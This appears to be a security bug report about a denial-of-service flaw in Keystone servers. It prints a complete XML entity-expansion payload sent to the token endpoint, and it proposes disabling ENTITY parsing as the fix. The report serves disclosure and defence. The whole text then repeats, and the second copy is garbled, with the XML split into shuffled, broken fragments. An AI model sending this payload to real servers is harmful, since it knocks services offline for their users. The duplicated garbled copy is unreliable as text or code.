Jonathan Murray from NCC Group reported that you can DoS keystone servers using XML entities in Keystone requests:
POST /v2.0/tokens HTTP/1.1
content-type: application/xml
<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>
In that precise case it might be an issue with the XML library we use, although it sounds generally safer to disable parsing ENTITY blocks entirely if we can.
Jonathan Murray from NCC Group reported that you can DoS keystone servers using XML entities in Keystone requests:
POST /v2.0/tokens HTTP/1.1
content-type: application/xml
<!DOCTYPE foo [ AAAAAAAAAAAAAAA AAAAAvAAAAAAAAA A" > &a;&a;& a;&a;&a; &a;" > &b;&b;& b;&b;&b; &b;" > &c;</tenantName > tials> &c;</username> &c;</username> &c;</username> &c;</username> &c;</password> &c;</somethingE lse> >&c;</something Else1> >&c;</something Else2> ntials>
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAA
<!ENTITY b "&a;&a;
<!ENTITY c "&b;&b;
]>
<auth>
<tenantName>
<passwordCreden
<username>
<username>
<username>
<username>
<password>
<somethingElse>
<somethingElse1
<somethingElse2
</passwordCrede
</auth>
In that precise case it might be an issue with the XML library we use, although it sounds generally safer to disable parsing ENTITY blocks entirely if we can.